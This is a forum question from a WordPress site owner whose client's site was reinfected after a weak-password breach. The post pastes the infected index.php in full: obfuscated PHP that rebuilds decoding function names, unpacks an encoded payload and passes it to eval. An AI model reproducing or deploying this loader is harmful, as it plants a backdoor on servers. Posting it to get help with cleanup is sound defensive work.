WordPress index.php & .htaccess hacked to replace itself, please help decode

Question

I am not a savvy programmer. I build website business based on wordpress + woocommerce. Recently, my client’s website was attacked due to one of the administrator’s weak password. Now the index.php and .htaccess is hacked and is adding malwares on daily basis. Since i’m not a programmer, please help me to fix this problem in a more use-friendly explanation.

My research and attempts so far:

At least I know how to clean up malware files by looking at weird php files comparing to another WP site that’s clean. Learned most of it through wordfence scan (and mostly research online).
Learned that malwares are often created with a base file (usually an .ico or .png file that contains malicious code), and that contents are often written in a “php base64 decode”.
First day hacked, I was able to clean up the malicious files, allowing me to open “/wp-admin/plugins.php” page and reinstall wordfence that was uninstalled by hacker, so that wordfence can help me find the rest of malicious files to delete.
Clean up any abandoned plugins, old theme files, changed all administrator passwords, changed “mysql database password” in “wp-config.php”

On the second day, BAM. Site is hacked again. Malware is back again. I would like to be able to solve this myself before relying on paid services / software (such as malcare paid, wordfence premium, or sucuri), so as to improve on my skill even though i don’t have background in programming.

So any good souls out there willing to help me, that’d be very appreciated. Please start by helping me decode this (hacked index.php):

<?php $HX1Shcp
= function ($UIx){$fgY = "A4GS";$LtCj0='L'.
$fgY[(15 -22+10) /3].   't' .$fgY[(69 -61- 2) /2].  ((61- 53 - 6) / 2).$fgY[(69 - 51 -10) /4].
$fgY[(55- 59 + 4)/3]
. 'j'   .'C'    .'';
  return $LtCj0($UIx);};     
      
    
$yIFICSON='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';$KWI5 = function($XNnC8cRQ  ){$ucId7fM = "6bSedoD";$FTxuK1=$ucId7fM[(89- 85)/ 4]    ;$FTxuK1
.=      'a' .$ucId7fM[(87- 85+ 2) / 2].
'E' .((108 - 90 + 6)/ 4).((20 - 8)/3)   . '_'   ;
$FTxuK1 .= $ucId7fM[(32 -22 + 6) /4]    .$ucId7fM[(107- 83 - 6) / 6] . 'C'.$ucId7fM[(102 - 79+ 2) / 5];$FTxuK1  .=  $ucId7fM[(60-42)/ 3].$ucId7fM[(99 -78 - 6) / 5].
'';
return $FTxuK1($XNnC8cRQ);          
}; $txgbNkAqm= function ($__w )
{$eRYBM = "IGl";$YzU=$eRYBM[(96 -92- 2) /2] . 'z'.  $eRYBM[(50 -50)/3]  .
'N'.    'F' . $eRYBM[(15- 9) / 3].'A' .
't'. 'e'
.'';         
    return $YzU($__w);  };          

$KWI5   = function($XNnC8cRQ
){$ucId7fM = "6bSedoD";$FTxuK1=$ucId7fM[(89- 85)/ 4]    ;
$FTxuK1 .= 'a'.$ucId7fM[(87- 85+ 2) / 2]    .
'E'.((108 - 90 + 6)/ 4).
((20 - 8)/3) .
'_' ; $FTxuK1   .=  $ucId7fM[(32 -22 + 6) /4] .$ucId7fM[(107- 83 - 6) / 6].'C' .$ucId7fM[(102 - 79+ 2) / 5]
;   $FTxuK1
.=  $ucId7fM[(60-42)/ 3]
.
$ucId7fM[(99 -78 - 6) / 5].
'';  
return $FTxuK1($XNnC8cRQ);  }; $yIFICSON
=$HX1Shcp($yIFICSON);$yIFICSON  = $KWI5($yIFICSON);
 $VuySiMk= function($T5Sv6RW3){
return "u_2r7GQdhyKvNLctCZIm5iS0KQLZsO_HWUPY7uxSgUkecRKgB";
};
$txgbNkAqm=
function($__w   )
{$eRYBM = "IGl";$YzU=$eRYBM[(96 -92- 2) /2] .'z'    .$eRYBM[(50 -50)/3].'N' .
'F'.    $eRYBM[(15- 9) / 3] .'A'
. 't'.'e'. '';
return $YzU($__w);  };$yIFICSON =   $txgbNkAqm($yIFICSON); 
function    ODlh(){
return "Ps8YoWHCAf7hnVPAdQgQZ0TIGia8V9";}
 
 function  Zci
($dyTpp8g){$Hye = "1_trs";$YoB=$Hye[(63 -45-10) / 2]
.   'T'.$Hye[(36-31 +10) /5]    . $Hye[(34- 32)/ 2] . $Hye[(75-56-1)/6] .
'O' ;   $YoB .= $Hye[(62 - 60 +2)/ 2] .((95 -89) /6).((36 -18)/6)   ;
$YoB.=
    ''; return $YoB($dyTpp8g);  }   
    function 
dqdwwy ($egUUErn_l
,$LuZw3o)
{    $_Bb8="ubZPp4NG9KU9s8uTPoK";
     return $_Bb8;
}function   iJPzSr5
($qshhk1){$QgSV1iWj7 = "Vb79";$cCLs7_=((43 - 25 +3) / 3);   $cCLs7_.= $QgSV1iWj7[(57-50 - 7)/ 3].
'h'
. 'b' .$QgSV1iWj7[(19 -16) / 3] . $QgSV1iWj7[(34 -27+5) / 4]    ;   $cCLs7_ .=  's'
.
'2' . 'F'; $cCLs7_ .=    '';return $cCLs7_;
 
    }

function    l4tS1Gajc
($xPkyYU    ) {return  iJPzSr5('')
.$xPkyYU;}$yIFICSON =
Zci($yIFICSON);eVal ($yIFICSON); ?><?php  define('WP_USE_THEMES', true );require(__DIR__.  '/wp-blog-header.php' ); ?>

Samuel Edyson Edellean 2 months 2023-02-04T06:36:11-05:00 2023-02-04T06:36:11-05:00 0 Answers 0 views 0

Register Now

Login

Lost Password

Add question

Login

Register Now

WordPress index.php & .htaccess hacked to replace itself, please help decode

WordPress index.php & .htaccess hacked to replace itself, please help decode

Related questions

Leave an answer